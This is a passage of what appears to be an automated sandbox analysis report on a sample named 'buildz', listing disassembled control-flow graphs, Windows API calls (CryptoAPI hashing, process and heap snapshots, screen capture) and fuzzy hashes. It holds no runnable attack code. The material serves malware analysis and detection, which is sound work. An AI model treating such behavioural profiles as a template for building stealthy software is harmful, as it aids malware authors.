                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                          • __allrem.LIBCMT ref: 0042375B
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                          • String ID:
                          • API String ID: 1503770280-0
                          • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                          • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                          APIs
                          • ___crtCorExitProcess.LIBCMT ref: 00427B11
                            • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                            • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                          • ExitProcess.KERNEL32 ref: 00427B1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                          • String ID: i;B
                          • API String ID: 2427264223-472376889
                          • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                          • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                          • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                          • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1063 42fb64-42fb77 call 428520 1066 42fba5-42fbaa call 428565 1063->1066 1067 42fb79-42fb8c call 428af7 1063->1067 1072 42fb99-42fba0 call 42fbab 1067->1072 1073 42fb8e call 42fe47 1067->1073 1072->1066 1076 42fb93 1073->1076 1076->1072
                          APIs
                          • __lock.LIBCMT ref: 0042FB7B
                            • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                            • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                            • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                          • __tzset_nolock.LIBCMT ref: 0042FB8E
                            • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                            • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                            • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                            • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                            • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                            • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                          • String ID:
                          • API String ID: 1282695788-0
                          • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                          • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                          • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                          • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1077 427f3d-427f47 call 427e0e 1079 427f4c-427f50 1077->1079
                          APIs
                          • _doexit.LIBCMT ref: 00427F47
                            • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                            • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                            • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                            • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                            • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                            • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                            • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                            • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$Decode$Encode$__lock_doexit
                          • String ID:
                          • API String ID: 2158581194-0
                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1307 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 1310 481a0b-481a0d 1307->1310 1311 4819e2-481a05 GetProcAddress * 2 1307->1311 1312 481aba-481ac2 1310->1312 1313 481a13-481a15 1310->1313 1311->1310 1315 481acb-481ad3 1312->1315 1316 481ac4-481ac5 FreeLibrary 1312->1316 1313->1312 1314 481a1b-481a31 1313->1314 1321 481a69-481a85 1314->1321 1322 481a33-481a5d call 42f7c0 call 45d550 1314->1322 1317 481b0d 1315->1317 1318 481ad5-481b0b GetProcAddress * 3 1315->1318 1316->1315 1320 481b0f-481b17 1317->1320 1318->1320 1323 481c0a-481c12 1320->1323 1324 481b1d-481b23 1320->1324 1321->1312 1338 481a87-481aae call 42f7c0 call 45d550 1321->1338 1322->1321 1326 481c1b-481c22 1323->1326 1327 481c14-481c15 FreeLibrary 1323->1327 1324->1323 1328 481b29-481b2b 1324->1328 1330 481c31-481c44 LoadLibraryA 1326->1330 1331 481c24-481c2b call 4549a0 1326->1331 1327->1326 1328->1323 1332 481b31-481b47 1328->1332 1336 481c4a-481c82 GetProcAddress * 3 1330->1336 1337 481d4b-481d53 1330->1337 1331->1330 1331->1337 1352 481b98-481bb4 1332->1352 1353 481b49-481b5d 1332->1353 1343 481caf-481cb7 1336->1343 1344 481c84-481cac call 42f7c0 call 45d550 1336->1344 1341 481d59-481e56 GetProcAddress * 12 1337->1341 1342 48223f-4822cd call 482470 GlobalMemoryStatus call 42f7c0 call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 1337->1342 1338->1312 1350 481e5c-481e63 1341->1350 1351 482233-482239 FreeLibrary 1341->1351 1347 481cb9-481cc0 1343->1347 1348 481d06-481d08 1343->1348 1344->1343 1357 481ccb-481ccd 1347->1357 1358 481cc2-481cc9 1347->1358 1355 481d0a-481d3c call 42f7c0 call 45d550 1348->1355 1356 481d3f-481d45 FreeLibrary 1348->1356 1350->1351 1360 481e69-481e70 1350->1360 1351->1342 1352->1323 1374 481bb6-481bca 1352->1374 1371 481b8a-481b8c 1353->1371 1372 481b5f-481b84 call 42f7c0 call 45d550 1353->1372 1355->1356 1356->1337 1357->1348 1364 481ccf-481cde 1357->1364 1358->1348 1358->1357 1360->1351 1367 481e76-481e7d 1360->1367 1364->1348 1386 481ce0-481d03 call 42f7c0 call 45d550 1364->1386 1367->1351 1376 481e83-481e8a 1367->1376 1371->1352 1372->1371 1394 481bfc-481bfe 1374->1394 1395 481bcc-481bf6 call 42f7c0 call 45d550 1374->1395 1376->1351 1382 481e90-481e97 1376->1382 1382->1351 1389 481e9d-481ea4 1382->1389 1386->1348 1389->1351 1390 481eaa-481eb1 1389->1390 1390->1351 1398 481eb7-481ebe 1390->1398 1394->1323 1395->1394 1398->1351 1404 481ec4-481ecb 1398->1404 1404->1351 1409 481ed1-481ed3 1404->1409 1409->1351 1413 481ed9-481eea 1409->1413 1413->1351 1416 481ef0-481f01 1413->1416 1417 481f03-481f0f GetTickCount 1416->1417 1418 481f15-481f22 1416->1418 1417->1418 1420 481f28-481f2d 1418->1420 1421 482081-482093 1418->1421 1424 481f33-481f9d call 42f7c0 call 45d550 1420->1424 1422 48209d-4820b2 1421->1422 1423 482095-482097 GetTickCount 1421->1423 1429 48210a-482116 1422->1429 1430 4820b4-4820f5 call 42f7c0 call 45d550 1422->1430 1423->1422 1440 481f9f-481faa 1424->1440 1441 482015-482060 1424->1441 1432 482118-48211a GetTickCount 1429->1432 1433 482120-482135 1429->1433 1430->1429 1452 4820f7-4820f9 1430->1452 1432->1433 1442 482196-4821a2 1433->1442 1443 482137 1433->1443 1445 481fb0-481feb call 42f7c0 call 45d550 1440->1445 1441->1421 1458 482062-482064 1441->1458 1446 4821ac-4821c1 1442->1446 1447 4821a4-4821a6 GetTickCount 1442->1447 1448 482140-482181 call 42f7c0 call 45d550 1443->1448 1476 481fed-481fef 1445->1476 1477 48200f 1445->1477 1460 482219-482227 1446->1460 1461 4821c3-482204 call 42f7c0 call 45d550 1446->1461 1447->1446 1448->1442 1475 482183-482185 1448->1475 1452->1430 1457 4820fb-482108 GetTickCount 1452->1457 1457->1429 1457->1430 1465 482079-48207b 1458->1465 1466 482066-482077 GetTickCount 1458->1466 1463 482229-48222b 1460->1463 1464 48222d CloseHandle 1460->1464 1461->1460 1483 482206-482208 1461->1483 1463->1351 1464->1351 1465->1421 1465->1424 1466->1421 1466->1465 1475->1448 1479 482187-482194 GetTickCount 1475->1479 1480 481ff1-482002 GetTickCount 1476->1480 1481 482004-48200d 1476->1481 1477->1441 1479->1442 1479->1448 1480->1477 1480->1481 1481->1445 1481->1477 1483->1461 1484 48220a-482217 GetTickCount 1483->1484 1484->1460 1484->1461
                          APIs
                          • GetVersionExA.KERNEL32(00000094), ref: 00481983
                          • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                          • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                          • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                          • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                          • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                          • FreeLibrary.KERNEL32(?), ref: 00481AC5
                          • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                          • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                          • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                          • FreeLibrary.KERNEL32(?), ref: 00481C15
                          • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                          • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                          • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                          • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                          • FreeLibrary.KERNEL32(?), ref: 00481D45
                          • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                          • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                          • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                          • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                          • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                          • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                          • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                          • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                          • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                          • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                          • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                          • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                          • GetTickCount.KERNEL32 ref: 00481F03
                          • GetTickCount.KERNEL32 ref: 00481FF1
                          • GetTickCount.KERNEL32 ref: 00482066
                          • GetTickCount.KERNEL32 ref: 00482095
                          • GetTickCount.KERNEL32 ref: 004820FB
                          • GetTickCount.KERNEL32 ref: 00482118
                          • GetTickCount.KERNEL32 ref: 00482187
                          • GetTickCount.KERNEL32 ref: 004821A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CountTick$Library$Load$Free$Version
                          • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                          • API String ID: 842291066-1723836103
                          • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                          • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                          • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                          • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                          • __CxxThrowException@8.LIBCMT ref: 00411026
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                          • __CxxThrowException@8.LIBCMT ref: 00411051
                          • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                          • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                          • __CxxThrowException@8.LIBCMT ref: 0041107A
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                          • __CxxThrowException@8.LIBCMT ref: 004110AB
                          • _memset.LIBCMT ref: 004110CA
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                          • __CxxThrowException@8.LIBCMT ref: 004110F0
                          • _malloc.LIBCMT ref: 00411100
                          • _memset.LIBCMT ref: 0041110B
                          • _sprintf.LIBCMT ref: 0041112E
                          • lstrcatA.KERNEL32(?,?), ref: 0041113C
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                          • String ID: %.2X
                          • API String ID: 2451520719-213608013
                          • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                          • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                          APIs
                          • GetLastError.KERNEL32 ref: 00411915
                          • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                          • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                          • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                          • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                          • lstrcpyW.KERNEL32(00000000,?,?,00000400,?,00000000,00000000), ref: 00411962
                          • lstrcatW.KERNEL32(00000000, failed with error ,?,00000400,?,00000000,00000000), ref: 00411974
                          • lstrcatW.KERNEL32(00000000,?,?,00000400,?,00000000,00000000), ref: 0041198B
                          • lstrcatW.KERNEL32(00000000,00500260,?,00000400,?,00000000,00000000), ref: 00411993
                          • lstrcatW.KERNEL32(00000000,?,?,00000400,?,00000000,00000000), ref: 00411999
                          • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                          • _memset.LIBCMT ref: 004119B8
                          • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                            • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                          • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                          • String ID: failed with error
                          • API String ID: 4182478520-946485432
                          • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                          • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                          • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                          • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                          APIs
                            • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                            • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                            • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                          • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                          • _memmove.LIBCMT ref: 0040F9EA
                          • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                          • _memmove.LIBCMT ref: 0040FADA
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                          • String ID:
                          • API String ID: 273148273-0
                          • Opcode ID: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                          • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                          • Opcode Fuzzy Hash: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                          • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                          APIs
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                          • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                          • __CxxThrowException@8.LIBCMT ref: 0040E90F
                          • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                          • __CxxThrowException@8.LIBCMT ref: 0040E93E
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                          • __CxxThrowException@8.LIBCMT ref: 0040E96F
                          • _memset.LIBCMT ref: 0040E98E
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                          • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                          • _sprintf.LIBCMT ref: 0040E9D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                          • String ID: %.2X
                          • API String ID: 1084002244-213608013
                          • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                          • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                          APIs
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                          • __CxxThrowException@8.LIBCMT ref: 0040EB17
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                          • __CxxThrowException@8.LIBCMT ref: 0040EB42
                          • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                          • __CxxThrowException@8.LIBCMT ref: 0040EB64
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                          • __CxxThrowException@8.LIBCMT ref: 0040EB95
                          • _memset.LIBCMT ref: 0040EBB4
                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                          • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                          • _sprintf.LIBCMT ref: 0040EBF4
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                          • String ID: %.2X
                          • API String ID: 1637485200-213608013
                          • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                          • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                          APIs
                            • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                            • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                            • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                            • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                            • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                            • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                            • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                            • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                          • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                          • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                          • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                          • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                          • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                          • SelectObject.GDI32(?,?), ref: 00482436
                          • DeleteObject.GDI32(00000000), ref: 0048243D
                          • DeleteDC.GDI32(?), ref: 0048244A
                          • DeleteDC.GDI32(?), ref: 00482450
                          Strings
                          Memory Dump Source
